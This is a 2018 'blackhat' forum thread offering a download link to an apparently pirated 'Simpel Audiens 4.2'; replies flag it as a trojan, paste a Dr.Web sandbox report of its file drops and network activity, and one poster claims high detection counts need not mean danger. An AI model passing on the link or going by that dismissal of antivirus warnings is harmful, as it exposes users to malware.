Best Blackhat Forum

Best Blackhat Forum > Freebies > Software, Scripts, Plug-ins, Tools and Bots > [GET] Simpel Audiens 4.2
Full Version: [GET] Simpel Audiens 4.2
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

mikepri89

01-17-2018, 07:47 AM
Download : http://www17.zippyshare.com/v/K6xaVzx9/file.html

egyptianwariorking

01-17-2018, 08:02 AM
does this stuff really work?
Thanks for sharing this.

badcoffee

01-17-2018, 09:56 AM
Beware...high virustotal.com total / 37 out of 63 say this contains a trojan....
PS: I am running successfully Browseo 3.13 with the same high virus [36 count] total, with no adverse consequences.
So, just because this does register a high total, doesn't make it dangerous.

However, the prior version of this program [simple audiens]...version 3.1, works just fine, and does not show up with these virus totals....so maybe just keep using the prior version 3.1 ??

egyptianwariorking

01-17-2018, 10:30 AM
(01-17-2018 09:56 AM)badcoffee Wrote: [ -> ]Beware...high virustotal.com total / 37 out of 63 say this contains a trojan....
PS: I am running successfully Browseo 3.13 with the same high virus [36 count] total, with no adverse consequences.
So, just because this does register a high total, doesn't make it dangerous.

However, the prior version of this program [simple audiens]...version 3.1, works just fine, and does not show up with these virus totals....so maybe just keep using the prior version 3.1 ??

thank you for warning
rep add

gelamac74

01-17-2018, 11:02 AM
Full of Viruses!
Again this guy with scam posts like VIRALISM before!

gelamac74

01-17-2018, 11:17 AM
Be Careful Don't Download!! Trojan!!!

[Image: 9Omky3u.png]


Trojan.Starter.2890

Added to Dr.Web virus database: 2013-12-20
Virus description was added: 2013-12-21
Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
%HOMEPATH%\Start Menu\Programs\Startup\server.exe
Malicious functions:
Creates and executes the following:
'%TEMP%\server.exe'
'%TEMP%\uTorrent.exe'
Executes the following:
'<SYSTEM32>\rundll32.exe' %TEMP%\Bunndle\BUNNDL~1.DLL,RunOfferManagerAgentW
Modifies file system :
Creates the following files:
%TEMP%\BunndleOfferManager.dll
%TEMP%\Bunndle\Bunndle.log
%APPDATA%\uTorrent\settings.dat.new
%HOMEPATH%\Cookies\%USERNAME%@localhost[1].txt
%TEMP%\utt4.tmp.new
%HOMEPATH%\Cookies\%USERNAME%@localhost[2].txt
%TEMP%\Bunndle\BunndleOfferManager-18B566E6-6250-49A3-BB1A-D456B869EA3E.dll
%TEMP%\utt3.tmp.new
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2052111302-484763869-725345543-1003\1f91d2d17ea675d4c2c3192e241743f9_23ef5514-3059-436f-a4a7-4cefaab20eb1
%TEMP%\aut2.tmp
%TEMP%\uTorrent.exe
%TEMP%\aut1.tmp
%TEMP%\server.exe
%APPDATA%\Microsoft\Protect\S-1-5-21-2052111302-484763869-725345543-1003\Preferred
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2052111302-484763869-725345543-1003\ec702f375e1b12d218f67ab9ef19ca23_23ef5514-3059-436f-a4a7-4cefaab20eb1
%APPDATA%\Microsoft\Protect\S-1-5-21-2052111302-484763869-725345543-1003\097bab22-59ee-460a-8d25-3a75026bd9f0
Deletes the following files:
%TEMP%\utt4.tmp
%HOMEPATH%\Cookies\%USERNAME%@localhost[1].txt
%TEMP%\aut1.tmp
%TEMP%\aut2.tmp
Moves the following files:
from %TEMP%\utt3.tmp.new to %TEMP%\utt3.tmp
from %TEMP%\utt4.tmp.new to %TEMP%\utt4.tmp
from %TEMP%\Bunndle\BunndleOfferManager-18B566E6-6250-49A3-BB1A-D456B869EA3E.dll to %TEMP%\Bunndle\BunndleOfferManager.dll
from %APPDATA%\uTorrent\settings.dat.new to %APPDATA%\uTorrent\settings.dat
from %APPDATA%\uTorrent\settings.dat to %APPDATA%\uTorrent\settings.dat.old
Network activity:
Connects to:
'se#####s.bunndle.com':443
'll##.###nload3.utorrent.com':80
'localhost':1036
'up####.utorrent.com':80
TCP:
HTTP GET requests:
ll##.###nload3.utorrent.com/offers/conduit-default.bmp
up####.utorrent.com/updatestats.php?cl##############################################################​################################################################################​##########################################################################
up####.utorrent.com/installstats.php?cl#############################################################​################################################################################​########
up####.utorrent.com/installoffer.php?h=#############################################################​###################################
up####.utorrent.com/installstats.php?cl#############################################################​######################################################
UDP:
DNS ASK ll##.###nload3.utorrent.com
DNS ASK se#####s.bunndle.com
DNS ASK up####.utorrent.com
Miscellaneous:
Searches for the following windows:
ClassName: 'Shell_TrayWnd' WindowName: '(null)'
ClassName: '?Torrent4823DF041B09' WindowName: '(null)'

tisna

01-17-2018, 11:39 AM
(01-17-2018 09:56 AM)badcoffee Wrote: [ -> ]Beware...high virustotal.com total / 37 out of 63 say this contains a trojan....
PS: I am running successfully Browseo 3.13 with the same high virus [36 count] total, with no adverse consequences.
So, just because this does register a high total, doesn't make it dangerous.

However, the prior version of this program [simple audiens]...version 3.1, works just fine, and does not show up with these virus totals....so maybe just keep using the prior version 3.1 ??

can you share version 3.1 please :)

sharkwhite

01-17-2018, 12:34 PM
Simpel Audiens version 4.2 does not even exist Biggrin
the latest version is the version x

t4p3design

01-28-2018, 06:58 AM
(01-17-2018 12:34 PM)sharkwhite Wrote: [ -> ]Simpel Audiens version 4.2 does not even exist Biggrin
the latest version is the version x

you are right buddy !
Best Blackhat Forum > Freebies > Software, Scripts, Plug-ins, Tools and Bots > [GET] Simpel Audiens 4.2
Reference URL's